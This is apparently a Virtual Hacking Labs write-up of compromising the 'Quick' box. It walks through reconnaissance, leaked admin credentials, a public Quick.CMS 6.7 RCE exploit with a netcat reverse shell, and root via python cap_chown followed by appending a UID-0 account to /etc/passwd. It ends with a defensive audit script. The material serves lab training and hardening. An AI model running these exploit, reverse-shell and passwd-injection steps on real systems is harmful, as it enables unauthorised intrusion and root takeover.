
# VHL — Quick

Quick.CMS v6.7 with a known authenticated RCE vulnerability. Admin credentials discovered via enumeration for initial access.

February 10, 2025 · Virtual Hacking Labs
#CMS #RCE #Quick.CMS #Apache

## nmap

```sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.20
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-10 01:16 EST
Nmap scan report for 10.11.1.20
Host is up (0.055s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 7f:80:87:eb:84:af:0d:b6:f5:11:fb:d5:d0:6d:f4:6c (RSA)
|   256 24:c5:af:74:66:67:5f:a6:2d:a4:87:0d:0c:cf:60:c9 (ECDSA)
|_  256 33:31:bc:a5:58:bf:aa:90:c0:fe:2d:b0:d7:b1:00:47 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Quick.Cms - fast and simple content management system
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-generator: Quick.Cms v6.7
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=2/10%OT=21%CT=1%CU=36878%PV=Y%DS=2%DC=I%G=Y%TM=67A9
OS:99C9%P=x86_64-pc-linux-gnu)SEQ(SP=FD%GCD=1%ISR=107%TI=Z%II=I%TS=A)SEQ(SP
OS:=FE%GCD=1%ISR=108%TI=Z%II=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5
OS:B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88
OS:%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%C
OS:C=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%
OS:IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT      ADDRESS
1   55.23 ms 10.11.1.20

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.62 seconds
```

## 21

```sh
21/tcp open  ftp     vsftpd 3.0.3
```

## 80

```sh
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Quick.Cms - fast and simple content management system
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-generator: Quick.Cms v6.7
```

## directory search

```sh
dirsearch -u http://10.11.1.20/

[08:32:06] Starting: 
[08:32:08] 403 -  275B  - /.ht_wsr.txt
[08:32:08] 403 -  275B  - /.htaccess.bak1
[08:32:08] 403 -  275B  - /.htaccess.orig
[08:32:08] 403 -  275B  - /.htaccess.save
[08:32:08] 403 -  275B  - /.htaccess.sample
[08:32:08] 403 -  275B  - /.htaccess_extra
[08:32:08] 403 -  275B  - /.htaccess_orig
[08:32:08] 403 -  275B  - /.htaccess_sc
[08:32:08] 403 -  275B  - /.htaccessBAK
[08:32:08] 403 -  275B  - /.htaccessOLD2
[08:32:08] 403 -  275B  - /.htaccessOLD
[08:32:08] 403 -  275B  - /.htm
[08:32:08] 403 -  275B  - /.html
[08:32:08] 403 -  275B  - /.htpasswd_test
[08:32:08] 403 -  275B  - /.httr-oauth
[08:32:08] 403 -  275B  - /.htpasswds
[08:32:09] 403 -  275B  - /.php
[08:32:14] 200 -    1KB - /admin.php
[08:32:24] 301 -  307B  - /core  ->  http://10.11.1.20/core/
[08:32:25] 301 -  311B  - /database  ->  http://10.11.1.20/database/
[08:32:25] 200 -  586B  - /database/
[08:32:27] 200 -   15KB - /favicon.ico
[08:32:28] 301 -  308B  - /files  ->  http://10.11.1.20/files/
[08:32:28] 200 -  688B  - /files/
[08:32:39] 200 -  648B  - /plugins/
[08:32:39] 301 -  310B  - /plugins  ->  http://10.11.1.20/plugins/
[08:32:39] 301 -  318B  - /plugins/tinymce  ->  http://10.11.1.20/plugins/tinymce/
[08:32:39] 200 -  582B  - /plugins/tinymce/
[08:32:42] 403 -  275B  - /server-status/
[08:32:42] 403 -  275B  - /server-status
[08:32:47] 301 -  312B  - /templates  ->  http://10.11.1.20/templates/
[08:32:47] 200 -  460B  - /templates/
```

## /database

Browsing the `/database/` directory found by dirsearch (http://10.11.1.20/database/) yields the admin credentials.

### creds

```
admin@localhost.local:admin123
```

## Quick.CMS 6.7 - Remote Code Execution (Authenticated)

- https://www.exploit-db.com/exploits/49494

```sh
python3 49494.py http://10.11.1.20/ 'admin@localhost.local' 'admin123' 172.16.1.2 1234
```

```sh
nc -lnvp 1234
listening on [any] 1234 ...
connect to [172.16.1.2] from (UNKNOWN) [10.11.1.20] 37794
bash: cannot set terminal process group (829): Inappropriate ioctl for device
bash: no job control in this shell
www-data@quick:/var/www/html$ whoami
whoami
www-data
```

Upgrade the shell to a pty:

```sh
python3 -c 'import pty; pty.spawn("/bin/bash")'
```

## privilege escalation

```sh
www-data@quick:/tmp$ uname -a
uname -a
Linux quick 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
www-data@quick:/tmp$ cat /etc/os-release
cat /etc/os-release
NAME="Ubuntu"
VERSION="20.04.1 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 20.04.1 LTS"
VERSION_ID="20.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=focal
UBUNTU_CODENAME=focal
```

```sh
╔══════════╣ Sudo version
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.31
```

```sh
╔══════════╣ Active Ports
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::21                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -     
```

```sh
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/nc
/usr/bin/netcat
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python3
/usr/bin/socat
/usr/bin/sudo
/usr/bin/wget

╔══════════╣ Installed Compilers

╔══════════╣ MySQL version
mysql  Ver 15.1 Distrib 10.3.25-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2
```

## python cap_chown capability

- https://gtfobins.github.io/gtfobins/python/#capabilities

```sh
Files with capabilities (limited to 50):
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/python3.8 = cap_chown+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
```

- change permissions for /etc/passwd

```sh
www-data@quick:/var/www/html$ /usr/bin/python3.8 -c 'import os;os.chown("/etc/passwd",33,33)'
```

```sh
www-data@quick:/tmp$ ls -al /etc/passwd
ls -al /etc/passwd
-rw-r--r-- 1 www-data www-data 2004 Mar 15  2021 /etc/passwd
```

Existing root entry:

```sh
root:x:0:0:root:/root:/bin/bash
```

Generate a password hash:

```sh
openssl passwd 'newroot'
$1$hL/tGXf4$PkCqeC8GfxudaFNUWNqvt1
```

New entry with that hash:

```sh
newroot:$1$hL/tGXf4$PkCqeC8GfxudaFNUWNqvt1:0:0:root:/root:/bin/bash
```

- add a new root user

```sh
www-data@quick:/tmp$ echo 'newroot:$1$hL/tGXf4$PkCqeC8GfxudaFNUWNqvt1:0:0:root:/root:/bin/bash' >> /etc/passwd
```

```sh
www-data@quick:/var/www/html$ su newroot
su newroot
Password: newroot

root@quick:/var/www/html# whoami
whoami
root
root@quick:/var/www/html# cat /root/key.txt
cat /root/key.txt
ciskzpric4095x6bytel
root@quick:/var/www/html# date
date
Mon 10 Feb 2025 02:47:14 PM UTC
```
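The escalation above rests on two misconfigurations a host audit can catch: an interpreter carrying a `cap_chown` file capability, and an `/etc/passwd` that ends up non-root-owned with a second UID-0 account and an inline password hash. The following Python script is an added defensive example, not code from the writeup or from Quick.CMS; it parses `getcap -r /` output and `/etc/passwd` text and flags those conditions. The sample inputs are constructed from the values shown in the writeup (the `www-data` line is a standard Ubuntu entry added for realism), and the `DANGEROUS_CAPS` list and the `audit_live_host` helper are my own choices.

```python
from __future__ import annotations
import re

# Assumed list: capabilities that let a process change ownership of, or bypass
# permission checks on, files it does not own, or otherwise become root.
DANGEROUS_CAPS = {
    "cap_chown", "cap_setuid", "cap_setgid", "cap_dac_override",
    "cap_dac_read_search", "cap_fowner", "cap_sys_admin", "cap_sys_ptrace",
    "cap_sys_module", "cap_setfcap",
}

# Constructed sample input, copied from the `getcap` lines in the writeup.
SAMPLE_GETCAP = """\
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/python3.8 = cap_chown+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
"""

# Constructed /etc/passwd excerpt: the root and newroot lines from the writeup
# plus a standard Ubuntu www-data entry.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
newroot:$1$hL/tGXf4$PkCqeC8GfxudaFNUWNqvt1:0:0:root:/root:/bin/bash
"""

# Matches both the older "/path = cap_x+ep" and the newer "/path cap_x=ep" getcap formats.
_GETCAP_LINE = re.compile(r"^(\S+)\s+(?:=\s+)?(\S.*)$")


def parse_getcap(output: str) -> dict[str, set[str]]:
    """Map each path in `getcap -r` output to the set of capability names it carries."""
    caps_by_path: dict[str, set[str]] = {}
    for line in output.splitlines():
        m = _GETCAP_LINE.match(line.strip())
        if not m:
            continue  # header lines, warnings, blanks
        path, capstr = m.groups()
        caps_by_path[path] = set(re.findall(r"cap_[a-z_]+", capstr))
    return caps_by_path


def flag_capabilities(caps_by_path: dict[str, set[str]]) -> dict[str, list[str]]:
    """Return {path: [dangerous caps]} for binaries whose file capabilities allow escalation."""
    flagged: dict[str, list[str]] = {}
    for path, caps in caps_by_path.items():
        bad = sorted(caps & DANGEROUS_CAPS)
        if bad:
            flagged[path] = bad
    return flagged


def audit_passwd(text: str, owner_uid: int = 0, owner_gid: int = 0,
                 mode: int = 0o644) -> list[tuple[str, str]]:
    """Check /etc/passwd content plus its ownership and mode (as os.stat reports them on a live host)."""
    findings: list[tuple[str, str]] = []
    if (owner_uid, owner_gid) != (0, 0):
        findings.append(("owner", f"/etc/passwd owned by uid {owner_uid} gid {owner_gid}, expected 0:0"))
    if mode & 0o022:
        findings.append(("mode", f"/etc/passwd mode {oct(mode)} is group- or world-writable"))
    uid0: list[str] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(("malformed", f"line {lineno} does not have 7 fields"))
            continue
        name, pw, uid, *_ = fields
        if uid == "0":
            uid0.append(name)
        # "x" means the hash lives in /etc/shadow; "*", "!", "!!" and "" are lock markers.
        if pw not in ("x", "*", "!", "!!", ""):
            findings.append(("hash_in_passwd", f"{name}: password hash stored directly in /etc/passwd"))
    if uid0 != ["root"]:
        findings.append(("uid0", f"UID 0 accounts: {', '.join(uid0)}"))
    return findings


def audit_live_host():
    """Run both checks on the current host; needs getcap from libcap. Not used by the sample run."""
    import os
    import subprocess
    out = subprocess.run(["getcap", "-r", "/"], capture_output=True, text=True).stdout
    st = os.stat("/etc/passwd")
    with open("/etc/passwd") as fh:
        passwd = fh.read()
    return (flag_capabilities(parse_getcap(out)),
            audit_passwd(passwd, st.st_uid, st.st_gid, st.st_mode & 0o777))


if __name__ == "__main__":
    print("capabilities:", flag_capabilities(parse_getcap(SAMPLE_GETCAP)))
    for kind, detail in audit_passwd(SAMPLE_PASSWD, owner_uid=33, owner_gid=33):
        print(f"[{kind}] {detail}")
```

On the sample data the script reports `/usr/bin/python3.8` for `cap_chown` and three `/etc/passwd` findings (non-root owner, an inline hash, and two UID-0 accounts), which is exactly the state the box was left in; `cap_net_raw` on `ping` is not flagged because it cannot alter other users' files. Run `audit_live_host()` from a scheduled job to get the same checks against a real system.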